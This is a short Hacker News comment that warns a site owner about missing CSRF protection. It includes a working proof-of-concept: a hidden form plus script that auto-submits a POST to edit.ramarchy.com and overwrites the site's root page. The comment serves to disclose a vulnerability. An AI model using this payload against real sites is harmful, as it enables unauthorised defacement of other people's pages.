Hacker News new | ask | show | jobs
by tokenizerrr 4098 days ago
You should probably do something to prefent CSRF. I just came up with this:

    <form id="lol" method="POST" action="http://edit.ramarchy.com/">
      <input type="hidden" name="route" value="/" />
      <input id="page" type="hidden" name="page" value="" />
      </form>
    <script>
    setTimeout(function() {
      document.getElementById('page').value = '<ht' + 'ml>' + document.documentElement.innerHTML + '</ht' + 'ml>';
      document.getElementById("lol").submit();
    }, 1000);
    </script>